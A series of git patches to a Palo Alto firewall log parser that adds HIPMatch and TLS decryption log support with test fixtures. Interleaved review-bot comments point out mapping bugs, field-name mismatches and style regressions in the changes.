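Review bot: The expected `@timestamp` here is `"2024-11-20T16:30:28Z"`, i.e. the second-resolution `TimeGenerated` value, even though the input also carries `TimeGeneratedHighResolution` (`2024-11-20T16:30:28.904000Z`); the CSV counterpart added in patch 52 (`test_hipmatch_csv.json`) instead expects the high-resolution field (`"2024-11-03T17:50:04.310000Z"`). If the parser is meant to prefer the high-resolution timestamp when present, the JSON representation is not doing so and this expectation locks the lower precision in; if the difference is intended, a short comment in the parser's timestamp stage naming which field wins for each representation would help the next reader. Either way the two fixtures should be reconciled deliberately rather than left to differ by accident.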
From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:23:49 +0100 Subject: [PATCH 51/84] fix(PaloAlto): extract host id and rule name for HIPMatch --- Palo Alto Networks/paloalto-ngfw/ingest/parser.yml | 4 ++-- .../paloalto-ngfw/tests/globalprotect_csv.json | 1 + .../paloalto-ngfw/tests/globalprotect_csv_2.json | 1 + .../paloalto-ngfw/tests/test_globalprotect.json | 1 + .../paloalto-ngfw/tests/test_hipmatch_json.json | 6 +++++- .../paloalto-ngfw/tests/test_new_globalprotect.json | 1 + 6 files changed, 11 insertions(+), 3 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index b7ec21cac..ba7fd4535 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml @@ -592,7 +592,7 @@ stages: event.module: "{{parsed_description.message.module}}" host.hostname: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName}}" host.name: "{{parsed_event.message.dvchost or parsed_event.message.PanOSEndpointDeviceName or parsed_event.message.LogSourceName or parsed_event.message.MachineName or parsed_event.message.shost or parsed_event.message.EndpointDeviceName or parsed_event.message.SourceDeviceHost or parsed_description.message.hostname}}" - host.id: "{{parsed_event.message.deviceExternalId}}" + host.id: "{{parsed_event.message.deviceExternalId or parsed_event.message.HostID}}" host.mac: "{{parsed_event.message.PanOSSourceDeviceMac or parsed_event.message.SourceDeviceMac}}" host.os.family: "{{parsed_event.message.PanOSSourceDeviceOSFamily}}" host.os.version: "{{parsed_event.message.PanOSSourceDeviceOSVersion or parsed_event.message.ClientOSVersion or parsed_event.message.SourceDeviceOSVersion}}" 
@@ -617,7 +617,7 @@ stages: observer.version: "{{parsed_event.message.DeviceVersion or parsed_event.message.GlobalProtectClientVersion}}" observer.serial_number: "{{parsed_event.message.DeviceSN}}" observer.name: "{{parsed_event.message.DeviceName}}" - rule.name: "{{parsed_event.message.Rule}}" + rule.name: "{{parsed_event.message.Rule or parsed_event.message.HipMatchName}}" rule.uuid: "{{parsed_event.message.PanOSRuleUUID or parsed_event.message.RuleUUID}}" source.bytes: "{{parsed_event.message.BytesSent or parsed_event.message.in}}" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json index 65f2b6940..127226ee3 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeee", "name": "AAAABBBBB", "os": { "version": "Microsoft Windows 10 Pro , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json index e4b1d5fab..1d68c400c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "8f0fd1d3-5d3b-49c3-9bee-247ff89a52f3", "name": "2021-02707", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json index f08a677ef..8eac8428d 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json @@ -21,6 +21,7 @@ "type": "0" }, "host": { + "id": "662f0b44-e024-4a70", "name": "2023-01724", "os": { "version": "Microsoft Windows 10 Enterprise , 64-bit" 
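Review bot: Mapping `HipMatchName` onto `rule.name` conflates a HIP object/profile name with a security policy rule: the same event carries a match type (`profile` in the fixtures) and nothing in this hunk records that the "rule" is a HIP match rather than a firewall rule. Consider keeping `rule.name: "{{parsed_event.message.Rule}}"` as it was and carrying the match under a vendor field, e.g. `paloalto.hip.match_name: "{{parsed_event.message.HipMatchName}}"` with `paloalto.hip.match_type: "{{parsed_event.message.HIPMatchType or parsed_event.message.HipMatchType}}"` (declared in `_meta/fields.yml`), or at least document the choice with `# HIP match profile/object name; PAN-OS HIPMATCH logs carry no policy rule` above the changed line. Note that the two representations spell the type key differently (`HIPMatchType` in the CSV column list of patch 52, `HipMatchType` in the JSON input of patch 50), so any mapping needs both.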
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json index 952e819e2..b0b294778 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_json.json @@ -24,6 +24,7 @@ "type": "hipmatch" }, "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", "name": "DESKTOP-01" }, "log": { @@ -56,6 +57,9 @@ "jdoe@example.org" ] }, + "rule": { + "name": "VPN Compliant" + }, "source": { "address": "1.2.3.4", "ip": "1.2.3.4", @@ -69,4 +73,4 @@ "name": "jdoe" } } -} +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json index 25db7ff0a..c0622d09c 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json @@ -25,6 +25,7 @@ "type": "globalprotect" }, "host": { + "id": "e4f14dfd-bd3c-40e5-9c4e", "name": "LNL-test" }, "log": { From 45faefddb4854625e6a8c01fda4a52418f4a62f1 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 18:27:19 +0100 Subject: [PATCH 52/84] fix(PaloAlto): add support for HipMatch dsv events --- .../paloalto-ngfw/ingest/parser.yml | 43 +++++++++++ .../tests/test_hipmatch_csv.json | 73 +++++++++++++++++++ 2 files changed, 116 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ba7fd4535..ea07e1d10 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -382,6 +382,49 @@ pipeline: - HighResolutionTimestamp delimiter: "," + # HIPMATCH CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceUser + - VirtualLocation + - MachineName + - EndpointOSType + - SourceAddress + - HipMatchName + - RepeatCount + - HIPMatchType + - FUTURE_USE + - FUTURE_USE + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - SourceIPv6 + - HostID + - EndpointSerialNumber + - SourceDeviceMac + - HighResolutionTimestamp + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json new file mode 100644 index 000000000..d32952899 --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_hipmatch_csv.json 
@@ -0,0 +1,73 @@ +{ + "input": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/11/03 18:50:04,111111111111,HIPMATCH,0,1111,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,", + "event": { + "category": [ + "network" + ], + "dataset": "hipmatch", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T17:50:04.310000Z", + "action": { + "type": "0" + }, + "host": { + "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4", + "name": "DESKTOP-01" + }, + "log": { + "hostname": "FW-CIV1", + "logger": "hipmatch" + }, + "observer": { + "name": "FW-CIV1", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "28", + "DGHierarchyLevel2": "99", + "DGHierarchyLevel3": "38", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "endpoint": { + "serial_number": "aefee8" + } + }, + "related": { + "ip": [ + "1.2.3.4" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "VPN Compliant" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "user": { + "name": "jdoe" + } + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From caa9e0ca8bb19e04ea9ebec30f3419cf3190ce53 Mon Sep 17 00:00:00 2001 
From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:02:45 +0100 Subject: [PATCH 53/84] fix(PaloAlto): improve support for decryption events --- .../paloalto-ngfw/_meta/fields.yml | 17 ++- .../paloalto-ngfw/ingest/parser.yml | 10 ++ .../tests/test_decryption_json.json | 118 ++++++++++++++++++ 3 files changed, 144 insertions(+), 1 deletion(-) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json diff --git a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml index e42125a42..4b07b6065 100644 --- a/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml +++ b/Palo Alto Networks/paloalto-ngfw/_meta/fields.yml @@ -318,7 +318,22 @@ paloalto.threat.type: name: paloalto.threat.type type: keyword +paloalto.tls.chain_status: + description: The trust in the TLS chain + name: paloalto.tls.chain_status + type: keyword + +paloalto.tls.root_status: + description: The trust in the root certificate + name: paloalto.tls.root_status + type: keyword + +paloalto.tls.sni: + description: The server name indication + name: paloalto.tls.sni + type: keyword + paloalto.vsys: - description: The virtual system + description: the virtual system name: paloalto.vsys type: keyword diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index ea07e1d10..c4abfd388 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
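Review bot: The hunk lowercases an unrelated description, `description: The virtual system` → `description: the virtual system` on `paloalto.vsys`, which regresses the capitalised style of every neighbouring entry including the three new `paloalto.tls.*` fields added just above it; revert that line or drop it from this commit. The new descriptions could also say where the values come from, e.g. `description: Trust status of the server certificate chain (decryption logs)`, since these keys appear to be populated only by the decryption-log mappings added in this same commit.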
@@ -651,6 +651,13 @@ stages: network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}" network.protocol: "{{parsed_description.message.proto}}" network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}" + tls.version: "{{parsed_event.message.TLSVersion[3:]}}" + tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}" + tls.curve: "{{parsed_event.message.EllipticCurve}}" + tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}" + tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}" + tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}" + tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}" observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}" observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}" observer.ingress.interface.name: "{{parsed_description.message.intf}}" @@ -795,6 +802,9 @@ stages: paloalto.vsys: "{{parsed_description.message.vsys}}" paloalto.authetification.profile: "{{parsed_description.message.auth_profile}}" paloalto.server.profile: "{{parsed_description.message.server_profile}}" + paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}" + paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}" + paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}" - set: paloalto.threat.type: > {%- set id = parsed_threat.message.threat_code | int -%} diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json new file mode 100644 index 000000000..bef30109a --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_json.json 
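Review bot: `tls.cipher` references `parsed_event.message.message.TLS_AUTH`, a doubled `.message` that can never resolve, and the templates for the auth, subject CN and serial use the CSV column names only (`TLS_AUTH`, `SubjectCommonName`, `CertificateSerialNumber`) whereas the JSON representation in the new `test_decryption_json.json` input spells them `TLSAuth`, `CommonName` and `CertificateSerial` — which is why that fixture's expected output has no `tls.cipher`, `tls.server.x509.subject.common_name` or `tls.server.x509.serial_number` despite the input carrying all three. Following the `a or b` pattern the file uses elsewhere: `tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.TLS_AUTH or parsed_event.message.TLSAuth}}"`, `tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName or parsed_event.message.CommonName}}"`, `tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber or parsed_event.message.CertificateSerial}}"`. Two further caveats: `TLSVersion[3:]` assumes a literal `TLS` prefix and yields odd values for anything else (and its behaviour on a missing field depends on the template engine), and the concatenated `tls.cipher` is not an IANA cipher-suite name (the fixture values would give `TLS_ECDHE_AES_256_GCM_SHA384`), so the fixture expectation should be updated deliberately once the field is populated.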
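Review bot: The decryption error fields are left unmapped: the new `test_decryption_json.json` input carries `"ErrorIndex":"Protocol"` and `"ErrorMessage":"General TLS protocol error. Received fatal alert DecodeError from server"`, and the CSV column list added in the next commit names the same data `ErrorIndex`/`Error`, yet neither this hunk nor the `tls.*` block maps them, so the fixture's expected output has no `error` object while reporting `event.outcome: success`. A session that was allowed by policy but failed TLS negotiation is exactly what analysts look for in decryption logs, so consider adding `error.message: "{{parsed_event.message.ErrorMessage or parsed_event.message.Error}}"` and `paloalto.tls.error_index: "{{parsed_event.message.ErrorIndex}}"` next to the three `paloalto.tls.*` lines (with a matching entry in `_meta/fields.yml`). If `event.outcome` is derived from `Action` in a stage outside this hunk, a comment there noting that it reflects the policy decision rather than the handshake result would avoid misreading.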
@@ -0,0 +1,118 @@ +{ + "input": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 
2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome 
Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. 
Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-20T16:39:51Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "start" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "logger": "decryption" + }, + "network": { + "application": "incomplete" + }, + "observer": { + "egress": { + "interface": { + "alias": "INTERNET" + } + }, + "ingress": { + "interface": { + "alias": "VPN-SSL" + } + }, + "product": "PAN-OS", + "serial_number": "no-serial" + }, + "paloalto": { + "Threat_ContentType": "start", + "VirtualLocation": "vsys1", + "tls": { + "chain_status": "Trusted", + "root_status": "trusted", + "sni": "static.files.example.org" + } + }, + "related": { + "hash": [ + "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + ], + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile", + "uuid": 
"eaf45b26-01ef-496c-990d-bbd1d89f2ed5" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 1042 + }, + "port": 58877, + "user": { + "domain": "example", + "name": "jdoe" + } + }, + "tls": { + "curve": "secp256r1", + "server": { + "hash": { + "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b" + }, + "x509": { + "issuer": { + "common_name": "GlobalSign ECC OV SSL CA 2018" + } + } + }, + "version": "1.2" + }, + "user": { + "domain": "example", + "name": "jdoe" + } + } +} \ No newline at end of file From c3dd2fd72690727297bbc75a2af3654af6dac91c Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 20 Nov 2024 19:03:17 +0100 Subject: [PATCH 54/84] fix(PaloAlto): add support for DSV Decryption events --- .../paloalto-ngfw/ingest/parser.yml | 118 ++++++++++++++++++ .../tests/test_decryption_csv.json | 98 +++++++++++++++ 2 files changed, 216 insertions(+) create mode 100644 Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json diff --git a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml index c4abfd388..944713355 100644 --- a/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml +++ b/Palo Alto Networks/paloalto-ngfw/ingest/parser.yml 
@@ -425,6 +425,124 @@ pipeline: - ClusterName delimiter: "," + # DECRYPTION CSV + - name: parsed_event + filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}" + external: + name: dsv.parse-dsv + properties: + input_field: original.message + output_field: message + columnnames: + - PaloAltoDomain + - ReceiveTime + - DeviceSN + - Type + - Subtype + - ConfigVersion + - GenerateTime + - SourceAddress + - DestinationAddress + - NATSourceIP + - NATDestinationIP + - Rule + - SourceUser + - DestinationUser + - Application + - VirtualLocation + - SourceZone + - DestinationZone + - InboundInterface + - OutboundInterface + - LogAction + - TimeLogged + - SessionID + - RepeatCount + - SourcePort + - DestinationPort + - NATSourcePort + - NATDestinationPort + - Flags + - IPProtocol + - Action + - Tunnel + - FUTURE_USE + - FUTURE_USE + - SourceVMUUID + - DestinationVMUUID + - UUIDforrule + - StageforClienttoFirewall + - StageforFirewalltoServer + - TLSVersion + - TLSKeyExchange + - TLSEncryptionAlgorithm + - TLS_AUTH + - PolicyName + - EllipticCurve + - ErrorIndex + - RootStatus + - ChainStatus + - ProxyType + - CertificateSerialNumber + - Fingerprint + - CertificateStartDate + - CertificateEndDate + - CertificateVersion + - CertificateSize + - CommonNameLength + - IssuerCommonNameLength + - RootCommonNameLength + - SNILength + - CertificateFlags + - SubjectCommonName + - IssuerSubjectCommonName + - RootSubjectCommonName + - ServerNameIndication + - Error + - ContainerID + - PODNamespace + - PODName + - SourceExternalDynamicList + - DestinationExternalDynamicList + - SourceDynamicAddressGroup + - DestinationDynamicAddressGroup + - HighResTimestamp + - SourceDeviceCategory + - SourceDeviceProfile + - SourceDeviceModel + - SourceDeviceVendor + - SourceDeviceOSFamily + - SourceDeviceOSVersion + - SourceHostname + - SourceMACAddress + - DestinationDeviceCategory + - DestinationDeviceProfile + - DestinationDeviceModel + - DestinationDeviceVendor + - DestinationDeviceOSFamily + - 
DestinationDeviceOSVersion + - DestinationHostname + - DestinationMACAddress + - SequenceNumber + - ActionFlags + - DGHierarchyLevel1 + - DGHierarchyLevel2 + - DGHierarchyLevel3 + - DGHierarchyLevel4 + - VirtualSystemName + - DeviceName + - VirtualSystemID + - ApplicationSubcategory + - ApplicationCategory + - ApplicationTechnology + - ApplicationRisk + - ApplicationCharacteristic + - ApplicationContainer + - ApplicationSaaS + - ApplicationSanctionedState + - ClusterName + delimiter: "," + - name: parsed_timestamp external: name: date.parse diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json new file mode 100644 index 000000000..6a413f53b --- /dev/null +++ b/Palo Alto Networks/paloalto-ngfw/tests/test_decryption_csv.json 
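Review bot: The new `columnnames:` list for `DECRYPTION` carries no indication of which PAN-OS decryption log format revision it transcribes, so when the vendor appends a field after `ClusterName` nothing in the file says what the list was checked against; a comment above it such as `# Column order follows the PAN-OS Decryption log CSV field order; re-check against the vendor field reference when the firewall version changes` would make that maintainable, and the same applies to the HIPMATCH list added to the prisma-access parser in a later commit of this series. The accompanying fixture ends up with `action.type: "0"` taken from the `Subtype` column, which suggests the mapping stage outside this hunk does not treat the numeric CSV subtype as a placeholder, though that cannot be confirmed from the lines shown. The enclosing `pipeline:` list continues before and after the hunk.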
